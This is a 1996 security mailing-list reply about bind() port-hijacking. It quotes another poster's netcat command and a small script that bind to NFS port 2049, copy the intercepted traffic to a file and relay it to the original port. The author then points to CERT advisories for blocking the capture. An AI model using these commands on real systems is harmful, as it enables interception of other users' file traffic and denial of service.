Re: BoS: bind() Security Problems

Darren Reed (avalon@coombs.anu.edu.au)
Mon, 5 Feb 1996 21:18:09 +1100

In some mail from invalid opcode, sie said:

> Yes, but if you do this:
> netcat -lvv -s 192.88.209.5 -p 2049 -e exploit.sh&
>
> exploit.sh:
> tee crap | netcat 192.88.209.5 2049
>
> and than you can capture it all to the file: crap, and redirect it to the
> original port.

A couple of things.  First, I answered the comments about IRC, not NFS.
My comments were not at all relevant to NFS (maybe I should have
deleted more text).

Second, you can prevent the above from working (see CERT Advisories on
NFS security problems) so that all that really does happen is you stop
the NFS packets reaching their real destination.  This latter bit is,
as the original poster mentioned, not able to be prevented easily on
most operating systems, commercially available today.

darren.